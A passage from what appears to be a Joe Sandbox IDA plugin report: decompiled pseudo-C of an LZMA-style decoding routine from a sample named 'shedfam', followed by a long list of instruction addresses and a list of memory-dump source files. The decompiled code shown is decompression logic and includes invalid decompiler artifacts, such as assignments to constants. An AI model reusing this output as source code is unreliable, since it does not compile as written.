                                                                  														 *_t369 =  *(__ebp - 0x48) + 1;
                                                                  														__eflags =  *_t369;
                                                                  														goto L113;
                                                                  													} else {
                                                                  														goto L110;
                                                                  													}
                                                                  												}
                                                                  												__ecx =  *(__ebp - 0xc);
                                                                  												__ebx = __ebx + __ebx;
                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                  												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                  												 *(__ebp - 0x44) = __ebx;
                                                                  												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                  													__ecx =  *(__ebp - 0x10);
                                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                  													__ebx = __ebx | 0x00000001;
                                                                  													__eflags = __ebx;
                                                                  													 *(__ebp - 0x44) = __ebx;
                                                                  												}
                                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  													L102:
                                                                  													_t339 = __ebp - 0x48;
                                                                  													 *_t339 =  *(__ebp - 0x48) - 1;
                                                                  													__eflags =  *_t339;
                                                                  													goto L103;
                                                                  												} else {
                                                                  													goto L100;
                                                                  												}
                                                                  											}
                                                                  											__edx =  *(__ebp - 4);
                                                                  											__eax = __eax - __ebx;
                                                                  											 *(__ebp - 0x40) = __ecx;
                                                                  											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                  											goto L109;
                                                                  										case 0x1a:
                                                                  											L56:
                                                                  											__eflags =  *(__ebp - 0x64);
                                                                  											if( *(__ebp - 0x64) == 0) {
                                                                  												 *(__ebp - 0x88) = 0x1a;
                                                                  												goto L170;
                                                                  											}
                                                                  											__ecx =  *(__ebp - 0x68);
                                                                  											__al =  *(__ebp - 0x5c);
                                                                  											__edx =  *(__ebp - 8);
                                                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                  											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                  											 *( *(__ebp - 0x68)) = __al;
                                                                  											__ecx =  *(__ebp - 0x14);
                                                                  											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                  											__eax = __ecx + 1;
                                                                  											__edx = 0;
                                                                  											_t192 = __eax %  *(__ebp - 0x74);
                                                                  											__eax = __eax /  *(__ebp - 0x74);
                                                                  											__edx = _t192;
                                                                  											goto L80;
                                                                  										case 0x1b:
                                                                  											L76:
                                                                  											__eflags =  *(__ebp - 0x64);
                                                                  											if( *(__ebp - 0x64) == 0) {
                                                                  												 *(__ebp - 0x88) = 0x1b;
                                                                  												goto L170;
                                                                  											}
                                                                  											__eax =  *(__ebp - 0x14);
                                                                  											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                  											__eflags = __eax -  *(__ebp - 0x74);
                                                                  											if(__eax >=  *(__ebp - 0x74)) {
                                                                  												__eax = __eax +  *(__ebp - 0x74);
                                                                  												__eflags = __eax;
                                                                  											}
                                                                  											__edx =  *(__ebp - 8);
                                                                  											__cl =  *(__eax + __edx);
                                                                  											__eax =  *(__ebp - 0x14);
                                                                  											 *(__ebp - 0x5c) = __cl;
                                                                  											 *(__eax + __edx) = __cl;
                                                                  											__eax = __eax + 1;
                                                                  											__edx = 0;
                                                                  											_t275 = __eax %  *(__ebp - 0x74);
                                                                  											__eax = __eax /  *(__ebp - 0x74);
                                                                  											__edx = _t275;
                                                                  											__eax =  *(__ebp - 0x68);
                                                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                  											_t284 = __ebp - 0x64;
                                                                  											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                  											__eflags =  *_t284;
                                                                  											 *( *(__ebp - 0x68)) = __cl;
                                                                  											L80:
                                                                  											 *(__ebp - 0x14) = __edx;
                                                                  											goto L81;
                                                                  										case 0x1c:
                                                                  											while(1) {
                                                                  												L124:
                                                                  												__eflags =  *(__ebp - 0x64);
                                                                  												if( *(__ebp - 0x64) == 0) {
                                                                  													break;
                                                                  												}
                                                                  												__eax =  *(__ebp - 0x14);
                                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                                  													__eflags = __eax;
                                                                  												}
                                                                  												__edx =  *(__ebp - 8);
                                                                  												__cl =  *(__eax + __edx);
                                                                  												__eax =  *(__ebp - 0x14);
                                                                  												 *(__ebp - 0x5c) = __cl;
                                                                  												 *(__eax + __edx) = __cl;
                                                                  												__eax = __eax + 1;
                                                                  												__edx = 0;
                                                                  												_t415 = __eax %  *(__ebp - 0x74);
                                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                                  												__edx = _t415;
                                                                  												__eax =  *(__ebp - 0x68);
                                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                  												__eflags =  *(__ebp - 0x30);
                                                                  												 *( *(__ebp - 0x68)) = __cl;
                                                                  												 *(__ebp - 0x14) = _t415;
                                                                  												if( *(__ebp - 0x30) > 0) {
                                                                  													continue;
                                                                  												} else {
                                                                  													L81:
                                                                  													 *(__ebp - 0x88) = 2;
                                                                  													goto L1;
                                                                  												}
                                                                  											}
                                                                  											 *(__ebp - 0x88) = 0x1c;
                                                                  											L170:
                                                                  											_push(0x22);
                                                                  											_pop(_t567);
                                                                  											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                                  											_t535 = 0;
                                                                  											L172:
                                                                  											return _t535;
                                                                  									}
                                                                  								}
                                                                  								L171:
                                                                  								_t535 = _t534 | 0xffffffff;
                                                                  								goto L172;
                                                                  							}
                                                                  						}
                                                                  						__eax =  *(__ebp - 0x50);
                                                                  						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                  						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                  						__eax =  *(__ebp - 0x58);
                                                                  						__esi = __edx + __eax;
                                                                  						 *(__ebp - 0x54) = __esi;
                                                                  						__ax =  *__esi;
                                                                  						__edi = __ax & 0x0000ffff;
                                                                  						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                  						if( *(__ebp - 0xc) >= __ecx) {
                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  							__cx = __ax;
                                                                  							__cx = __ax >> 5;
                                                                  							__eax = __eax - __ecx;
                                                                  							__edx = __edx + 1;
                                                                  							 *__esi = __ax;
                                                                  							 *(__ebp - 0x50) = __edx;
                                                                  						} else {
                                                                  							 *(__ebp - 0x10) = __ecx;
                                                                  							0x800 = 0x800 - __edi;
                                                                  							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                  							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                  							 *__esi = __cx;
                                                                  						}
                                                                  						if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  							goto L148;
                                                                  						} else {
                                                                  							goto L146;
                                                                  						}
                                                                  					}
                                                                  					goto L1;
                                                                  				}
                                                                  			}








                                                                  0x00000000
                                                                  0x00406969
                                                                  0x00406969
                                                                  0x0040696d
                                                                  0x00406992
                                                                  0x0040699c
                                                                  0x00000000
                                                                  0x0040696f
                                                                  0x0040696f
                                                                  0x00406972
                                                                  0x00406976
                                                                  0x00406979
                                                                  0x0040697c
                                                                  0x00406980
                                                                  0x00406980
                                                                  0x00406983
                                                                  0x00406a5d
                                                                  0x00406a5d
                                                                  0x00406a64
                                                                  0x00406a64
                                                                  0x00406a67
                                                                  0x00406a6e
                                                                  0x00406a9b
                                                                  0x00406a9f
                                                                  0x00406aff
                                                                  0x00406b02
                                                                  0x00406b07
                                                                  0x00406b08
                                                                  0x00406b0a
                                                                  0x00406b0c
                                                                  0x00406b0f
                                                                  0x00406a1b
                                                                  0x00406a1b
                                                                  0x00406a1b
                                                                  0x004061b7
                                                                  0x004061b7
                                                                  0x004061b7
                                                                  0x004061c0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061c6
                                                                  0x00000000
                                                                  0x004061d1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061da
                                                                  0x004061dd
                                                                  0x004061e0
                                                                  0x004061e4
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061ea
                                                                  0x004061ed
                                                                  0x004061ef
                                                                  0x004061f0
                                                                  0x004061f3
                                                                  0x004061f5
                                                                  0x004061f6
                                                                  0x004061f8
                                                                  0x004061fb
                                                                  0x00406200
                                                                  0x00406205
                                                                  0x0040620e
                                                                  0x00406221
                                                                  0x00406224
                                                                  0x00406230
                                                                  0x00406258
                                                                  0x0040625a
                                                                  0x00406268
                                                                  0x00406268
                                                                  0x0040626c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040625c
                                                                  0x0040625c
                                                                  0x0040625f
                                                                  0x00406260
                                                                  0x00406260
                                                                  0x00000000
                                                                  0x0040625c
                                                                  0x00406236
                                                                  0x0040623b
                                                                  0x0040623b
                                                                  0x00406244
                                                                  0x0040624c
                                                                  0x0040624f
                                                                  0x00000000
                                                                  0x00406255
                                                                  0x00406255
                                                                  0x00000000
                                                                  0x00406255
                                                                  0x00000000
                                                                  0x00406272
                                                                  0x00406272
                                                                  0x00406276
                                                                  0x00406b22
                                                                  0x00000000
                                                                  0x00406b22
                                                                  0x0040627f
                                                                  0x0040628f
                                                                  0x00406292
                                                                  0x00406295
                                                                  0x00406295
                                                                  0x00406295
                                                                  0x00406298
                                                                  0x0040629c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040629e
                                                                  0x004062a4
                                                                  0x004062ce
                                                                  0x004062d4
                                                                  0x004062db
                                                                  0x00000000
                                                                  0x004062db
                                                                  0x004062aa
                                                                  0x004062ad
                                                                  0x004062b2
                                                                  0x004062b2
                                                                  0x004062bd
                                                                  0x004062c5
                                                                  0x004062c8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040630d
                                                                  0x00406313
                                                                  0x00406316
                                                                  0x00406323
                                                                  0x0040632b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004062e2
                                                                  0x004062e2
                                                                  0x004062e6
                                                                  0x00406b31
                                                                  0x00000000
                                                                  0x00406b31
                                                                  0x004062f2
                                                                  0x004062fd
                                                                  0x004062fd
                                                                  0x004062fd
                                                                  0x00406300
                                                                  0x00406303
                                                                  0x00406306
                                                                  0x0040630b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004069a2
                                                                  0x004069a2
                                                                  0x004069a8
                                                                  0x004069ae
                                                                  0x004069b4
                                                                  0x004069ce
                                                                  0x004069d1
                                                                  0x004069d7
                                                                  0x004069e2
                                                                  0x004069e2
                                                                  0x004069e4
                                                                  0x004069b6
                                                                  0x004069b6
                                                                  0x004069c5
                                                                  0x004069c9
                                                                  0x004069c9
                                                                  0x004069ee
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004069f0
                                                                  0x004069f4
                                                                  0x00406ba3
                                                                  0x00000000
                                                                  0x00406ba3
                                                                  0x00406a00
                                                                  0x00406a07
                                                                  0x00406a0f
                                                                  0x00406a12
                                                                  0x00406a15
                                                                  0x00406a15
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406333
                                                                  0x00406335
                                                                  0x00406338
                                                                  0x004063a9
                                                                  0x004063ac
                                                                  0x004063af
                                                                  0x004063b6
                                                                  0x004063c0
                                                                  0x00000000
                                                                  0x004063c0
                                                                  0x0040633a
                                                                  0x0040633e
                                                                  0x00406341
                                                                  0x00406343
                                                                  0x00406346
                                                                  0x00406349
                                                                  0x0040634b
                                                                  0x0040634e
                                                                  0x00406350
                                                                  0x00406355
                                                                  0x00406358
                                                                  0x0040635b
                                                                  0x0040635f
                                                                  0x00406366
                                                                  0x00406369
                                                                  0x00406370
                                                                  0x00406374
                                                                  0x0040637c
                                                                  0x0040637c
                                                                  0x0040637c
                                                                  0x00406376
                                                                  0x00406376
                                                                  0x00406376
                                                                  0x0040636b
                                                                  0x0040636b
                                                                  0x0040636b
                                                                  0x00406380
                                                                  0x00406383
                                                                  0x004063a1
                                                                  0x004063a3
                                                                  0x00000000
                                                                  0x00406385
                                                                  0x00406385
                                                                  0x00406388
                                                                  0x0040638b
                                                                  0x0040638e
                                                                  0x00406390
                                                                  0x00406390
                                                                  0x00406390
                                                                  0x00406393
                                                                  0x00406396
                                                                  0x00406398
                                                                  0x00406399
                                                                  0x0040639c
                                                                  0x00000000
                                                                  0x0040639c
                                                                  0x00000000
                                                                  0x004065d2
                                                                  0x004065d6
                                                                  0x004065f4
                                                                  0x004065f7
                                                                  0x004065fe
                                                                  0x00406601
                                                                  0x00406604
                                                                  0x00406607
                                                                  0x0040660a
                                                                  0x0040660d
                                                                  0x0040660f
                                                                  0x00406616
                                                                  0x00406617
                                                                  0x00406619
                                                                  0x0040661c
                                                                  0x0040661f
                                                                  0x00406622
                                                                  0x00406622
                                                                  0x00406627
                                                                  0x00000000
                                                                  0x00406627
                                                                  0x004065d8
                                                                  0x004065db
                                                                  0x004065de
                                                                  0x004065e8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040663c
                                                                  0x00406640
                                                                  0x00406663
                                                                  0x00406666
                                                                  0x00406669
                                                                  0x00406673
                                                                  0x00406642
                                                                  0x00406642
                                                                  0x00406645
                                                                  0x00406648
                                                                  0x0040664b
                                                                  0x00406658
                                                                  0x0040665b
                                                                  0x0040665b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040667f
                                                                  0x00406683
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406689
                                                                  0x0040668d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406693
                                                                  0x00406695
                                                                  0x00406699
                                                                  0x00406699
                                                                  0x0040669c
                                                                  0x004066a0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004066f0
                                                                  0x004066f4
                                                                  0x004066fb
                                                                  0x004066fe
                                                                  0x00406701
                                                                  0x0040670b
                                                                  0x00000000
                                                                  0x0040670b
                                                                  0x004066f6
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406717
                                                                  0x0040671b
                                                                  0x00406722
                                                                  0x00406725
                                                                  0x00406728
                                                                  0x0040671d
                                                                  0x0040671d
                                                                  0x0040671d
                                                                  0x0040672b
                                                                  0x0040672e
                                                                  0x00406731
                                                                  0x00406731
                                                                  0x00406734
                                                                  0x00406737
                                                                  0x0040673a
                                                                  0x0040673a
                                                                  0x0040673d
                                                                  0x00406744
                                                                  0x00406749
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004067d7
                                                                  0x004067d7
                                                                  0x004067db
                                                                  0x00406b79
                                                                  0x00000000
                                                                  0x00406b79
                                                                  0x004067e1
                                                                  0x004067e4
                                                                  0x004067e7
                                                                  0x004067eb
                                                                  0x004067ee
                                                                  0x004067f4
                                                                  0x004067f6
                                                                  0x004067f6
                                                                  0x004067f6
                                                                  0x004067f9
                                                                  0x004067fc
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004063cc
                                                                  0x004063cc
                                                                  0x004063d0
                                                                  0x00406b3d
                                                                  0x00000000
                                                                  0x00406b3d
                                                                  0x004063d6
                                                                  0x004063d9
                                                                  0x004063dc
                                                                  0x004063e0
                                                                  0x004063e3
                                                                  0x004063e9
                                                                  0x004063eb
                                                                  0x004063eb
                                                                  0x004063eb
                                                                  0x004063ee
                                                                  0x004063f1
                                                                  0x004063f1
                                                                  0x004063f4
                                                                  0x004063f7
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004063fd
                                                                  0x00406403
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406409
                                                                  0x00406409
                                                                  0x0040640d
                                                                  0x00406410
                                                                  0x00406413
                                                                  0x00406416
                                                                  0x00406419
                                                                  0x0040641a
                                                                  0x0040641d
                                                                  0x0040641f
                                                                  0x00406425
                                                                  0x00406428
                                                                  0x0040642b
                                                                  0x0040642e
                                                                  0x00406431
                                                                  0x00406434
                                                                  0x00406437
                                                                  0x00406453
                                                                  0x00406456
                                                                  0x00406459
                                                                  0x0040645c
                                                                  0x00406463
                                                                  0x00406467
                                                                  0x00406469
                                                                  0x0040646d
                                                                  0x00406439
                                                                  0x00406439
                                                                  0x0040643d
                                                                  0x00406445
                                                                  0x0040644a
                                                                  0x0040644c
                                                                  0x0040644e
                                                                  0x0040644e
                                                                  0x00406470
                                                                  0x00406477
                                                                  0x0040647a
                                                                  0x00000000
                                                                  0x00406480
                                                                  0x00000000
                                                                  0x00406480
                                                                  0x00000000
                                                                  0x00406485
                                                                  0x00406485
                                                                  0x00406489
                                                                  0x00406b49
                                                                  0x00000000
                                                                  0x00406b49
                                                                  0x0040648f
                                                                  0x00406492
                                                                  0x00406495
                                                                  0x00406499
                                                                  0x0040649c
                                                                  0x004064a2
                                                                  0x004064a4
                                                                  0x004064a4
                                                                  0x004064a4
                                                                  0x004064a7
                                                                  0x004064aa
                                                                  0x004064aa
                                                                  0x004064aa
                                                                  0x004064b0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004064b2
                                                                  0x004064b5
                                                                  0x004064b8
                                                                  0x004064bb
                                                                  0x004064be
                                                                  0x004064c1
                                                                  0x004064c4
                                                                  0x004064c7
                                                                  0x004064ca
                                                                  0x004064cd
                                                                  0x004064d0
                                                                  0x004064e8
                                                                  0x004064eb
                                                                  0x004064ee
                                                                  0x004064f1
                                                                  0x004064f1
                                                                  0x004064f4
                                                                  0x004064f8
                                                                  0x004064fa
                                                                  0x004064d2
                                                                  0x004064d2
                                                                  0x004064da
                                                                  0x004064df
                                                                  0x004064e1
                                                                  0x004064e3
                                                                  0x004064e3
                                                                  0x004064fd
                                                                  0x00406504
                                                                  0x00406507
                                                                  0x00000000
                                                                  0x00406509
                                                                  0x00000000
                                                                  0x00406509
                                                                  0x00406507
                                                                  0x0040650e
                                                                  0x0040650e
                                                                  0x0040650e
                                                                  0x0040650e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406549
                                                                  0x00406549
                                                                  0x0040654d
                                                                  0x00406b55
                                                                  0x00000000
                                                                  0x00406b55
                                                                  0x00406553
                                                                  0x00406556
                                                                  0x00406559
                                                                  0x0040655d
                                                                  0x00406560
                                                                  0x00406566
                                                                  0x00406568
                                                                  0x00406568
                                                                  0x00406568
                                                                  0x0040656b
                                                                  0x0040656e
                                                                  0x0040656e
                                                                  0x00406574
                                                                  0x00406512
                                                                  0x00406512
                                                                  0x00406515
                                                                  0x00000000
                                                                  0x00406515
                                                                  0x00406576
                                                                  0x00406576
                                                                  0x00406579
                                                                  0x0040657c
                                                                  0x0040657f
                                                                  0x00406582
                                                                  0x00406585
                                                                  0x00406588
                                                                  0x0040658b
                                                                  0x0040658e
                                                                  0x00406591
                                                                  0x00406594
                                                                  0x004065ac
                                                                  0x004065af
                                                                  0x004065b2
                                                                  0x004065b5
                                                                  0x004065b5
                                                                  0x004065b8
                                                                  0x004065bc
                                                                  0x004065be
                                                                  0x00406596
                                                                  0x00406596
                                                                  0x0040659e
                                                                  0x004065a3
                                                                  0x004065a5
                                                                  0x004065a7
                                                                  0x004065a7
                                                                  0x004065c1
                                                                  0x004065c8
                                                                  0x004065cb
                                                                  0x00000000
                                                                  0x004065cd
                                                                  0x00000000
                                                                  0x004065cd
                                                                  0x00000000
                                                                  0x0040685a
                                                                  0x0040685a
                                                                  0x0040685e
                                                                  0x00406b85
                                                                  0x00000000
                                                                  0x00406b85
                                                                  0x00406864
                                                                  0x00406867
                                                                  0x0040686a
                                                                  0x0040686e
                                                                  0x00406871
                                                                  0x00406877
                                                                  0x00406879
                                                                  0x00406879
                                                                  0x00406879
                                                                  0x0040687c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040662a
                                                                  0x0040662a
                                                                  0x0040662d
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406a26
                                                                  0x00406a2a
                                                                  0x00406a48
                                                                  0x00406a48
                                                                  0x00406a48
                                                                  0x00406a4f
                                                                  0x00406a56
                                                                  0x00000000
                                                                  0x00406a56
                                                                  0x00406a2c
                                                                  0x00406a2f
                                                                  0x00406a32
                                                                  0x00406a35
                                                                  0x00406a3c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406b17
                                                                  0x00406b1a
                                                                  0x00406a1b
                                                                  0x00406a1b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406751
                                                                  0x00406753
                                                                  0x0040675a
                                                                  0x0040675b
                                                                  0x0040675d
                                                                  0x00406760
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406768
                                                                  0x0040676b
                                                                  0x0040676e
                                                                  0x00406770
                                                                  0x00406772
                                                                  0x00406772
                                                                  0x00406773
                                                                  0x00406776
                                                                  0x0040677d
                                                                  0x00406780
                                                                  0x0040678e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406a73
                                                                  0x00406a73
                                                                  0x00406a77
                                                                  0x00406baf
                                                                  0x00000000
                                                                  0x00406baf
                                                                  0x00406a7d
                                                                  0x00406a80
                                                                  0x00406a83
                                                                  0x00406a87
                                                                  0x00406a8a
                                                                  0x00406a90
                                                                  0x00406a92
                                                                  0x00406a92
                                                                  0x00406a92
                                                                  0x00406a95
                                                                  0x00406a98
                                                                  0x00406a98
                                                                  0x00406a98
                                                                  0x00406a98
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406796
                                                                  0x00406799
                                                                  0x004067cf
                                                                  0x004068ff
                                                                  0x004068ff
                                                                  0x004068ff
                                                                  0x004068ff
                                                                  0x00406902
                                                                  0x00406902
                                                                  0x00406905
                                                                  0x00406907
                                                                  0x00406b91
                                                                  0x00000000
                                                                  0x00406b91
                                                                  0x0040690d
                                                                  0x00406910
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406916
                                                                  0x0040691a
                                                                  0x0040691d
                                                                  0x0040691d
                                                                  0x0040691d
                                                                  0x00000000
                                                                  0x0040691d
                                                                  0x0040679b
                                                                  0x0040679d
                                                                  0x0040679f
                                                                  0x004067a1
                                                                  0x004067a4
                                                                  0x004067a5
                                                                  0x004067a7
                                                                  0x004067a9
                                                                  0x004067ac
                                                                  0x004067af
                                                                  0x004067c5
                                                                  0x004067ca
                                                                  0x00406802
                                                                  0x00406802
                                                                  0x00406806
                                                                  0x00406832
                                                                  0x00406834
                                                                  0x0040683b
                                                                  0x0040683e
                                                                  0x00406841
                                                                  0x00406841
                                                                  0x00406846
                                                                  0x00406846
                                                                  0x00406848
                                                                  0x0040684b
                                                                  0x00406852
                                                                  0x00406855
                                                                  0x00406882
                                                                  0x00406882
                                                                  0x00406885
                                                                  0x00406888
                                                                  0x004068fc
                                                                  0x004068fc
                                                                  0x004068fc
                                                                  0x00000000
                                                                  0x004068fc
                                                                  0x0040688a
                                                                  0x00406890
                                                                  0x00406893
                                                                  0x00406896
                                                                  0x00406899
                                                                  0x0040689c
                                                                  0x0040689f
                                                                  0x004068a2
                                                                  0x004068a5
                                                                  0x004068a8
                                                                  0x004068ab
                                                                  0x004068c4
                                                                  0x004068c6
                                                                  0x004068c9
                                                                  0x004068ca
                                                                  0x004068cd
                                                                  0x004068cf
                                                                  0x004068d2
                                                                  0x004068d4
                                                                  0x004068d6
                                                                  0x004068d9
                                                                  0x004068db
                                                                  0x004068de
                                                                  0x004068e2
                                                                  0x004068e4
                                                                  0x004068e4
                                                                  0x004068e5
                                                                  0x004068e8
                                                                  0x004068eb
                                                                  0x004068ad
                                                                  0x004068ad
                                                                  0x004068b5
                                                                  0x004068ba
                                                                  0x004068bc
                                                                  0x004068bf
                                                                  0x004068bf
                                                                  0x004068ee
                                                                  0x004068f5
                                                                  0x0040687f
                                                                  0x0040687f
                                                                  0x0040687f
                                                                  0x0040687f
                                                                  0x00000000
                                                                  0x004068f7
                                                                  0x00000000
                                                                  0x004068f7
                                                                  0x004068f5
                                                                  0x00406808
                                                                  0x0040680b
                                                                  0x0040680d
                                                                  0x00406810
                                                                  0x00406813
                                                                  0x00406816
                                                                  0x00406818
                                                                  0x0040681b
                                                                  0x0040681e
                                                                  0x0040681e
                                                                  0x00406821
                                                                  0x00406821
                                                                  0x00406824
                                                                  0x0040682b
                                                                  0x004067ff
                                                                  0x004067ff
                                                                  0x004067ff
                                                                  0x004067ff
                                                                  0x00000000
                                                                  0x0040682d
                                                                  0x00000000
                                                                  0x0040682d
                                                                  0x0040682b
                                                                  0x004067b1
                                                                  0x004067b4
                                                                  0x004067b6
                                                                  0x004067b9
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406518
                                                                  0x00406518
                                                                  0x0040651c
                                                                  0x00406b61
                                                                  0x00000000
                                                                  0x00406b61
                                                                  0x00406522
                                                                  0x00406525
                                                                  0x00406528
                                                                  0x0040652b
                                                                  0x0040652e
                                                                  0x00406531
                                                                  0x00406534
                                                                  0x00406536
                                                                  0x00406539
                                                                  0x0040653c
                                                                  0x0040653f
                                                                  0x00406541
                                                                  0x00406541
                                                                  0x00406541
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004066a3
                                                                  0x004066a3
                                                                  0x004066a7
                                                                  0x00406b6d
                                                                  0x00000000
                                                                  0x00406b6d
                                                                  0x004066ad
                                                                  0x004066b0
                                                                  0x004066b3
                                                                  0x004066b6
                                                                  0x004066b8
                                                                  0x004066b8
                                                                  0x004066b8
                                                                  0x004066bb
                                                                  0x004066be
                                                                  0x004066c1
                                                                  0x004066c4
                                                                  0x004066c7
                                                                  0x004066ca
                                                                  0x004066cb
                                                                  0x004066cd
                                                                  0x004066cd
                                                                  0x004066cd
                                                                  0x004066d0
                                                                  0x004066d3
                                                                  0x004066d6
                                                                  0x004066d9
                                                                  0x004066d9
                                                                  0x004066d9
                                                                  0x004066dc
                                                                  0x004066de
                                                                  0x004066de
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406920
                                                                  0x00406920
                                                                  0x00406920
                                                                  0x00406924
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040692a
                                                                  0x0040692d
                                                                  0x00406930
                                                                  0x00406933
                                                                  0x00406935
                                                                  0x00406935
                                                                  0x00406935
                                                                  0x00406938
                                                                  0x0040693b
                                                                  0x0040693e
                                                                  0x00406941
                                                                  0x00406944
                                                                  0x00406947
                                                                  0x00406948
                                                                  0x0040694a
                                                                  0x0040694a
                                                                  0x0040694a
                                                                  0x0040694d
                                                                  0x00406950
                                                                  0x00406953
                                                                  0x00406956
                                                                  0x00406959
                                                                  0x0040695d
                                                                  0x0040695f
                                                                  0x00406962
                                                                  0x00000000
                                                                  0x00406964
                                                                  0x004066e1
                                                                  0x004066e1
                                                                  0x00000000
                                                                  0x004066e1
                                                                  0x00406962
                                                                  0x00406b97
                                                                  0x00406bb9
                                                                  0x00406bbf
                                                                  0x00406bc1
                                                                  0x00406bc8
                                                                  0x00406bca
                                                                  0x00406bd1
                                                                  0x00406bd5
                                                                  0x00000000
                                                                  0x004061c6
                                                                  0x00406bce
                                                                  0x00406bce
                                                                  0x00000000
                                                                  0x00406bce
                                                                  0x00406a1b
                                                                  0x00406aa1
                                                                  0x00406aa7
                                                                  0x00406aaa
                                                                  0x00406aad
                                                                  0x00406ab0
                                                                  0x00406ab3
                                                                  0x00406ab6
                                                                  0x00406ab9
                                                                  0x00406abc
                                                                  0x00406ac2
                                                                  0x00406adb
                                                                  0x00406ade
                                                                  0x00406ae1
                                                                  0x00406ae4
                                                                  0x00406ae8
                                                                  0x00406aea
                                                                  0x00406aeb
                                                                  0x00406aee
                                                                  0x00406ac4
                                                                  0x00406ac4
                                                                  0x00406acc
                                                                  0x00406ad1
                                                                  0x00406ad3
                                                                  0x00406ad6
                                                                  0x00406ad6
                                                                  0x00406af8
                                                                  0x00000000
                                                                  0x00406afa
                                                                  0x00000000
                                                                  0x00406afa
                                                                  0x00406af8
                                                                  0x00000000
                                                                  0x0040696d

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
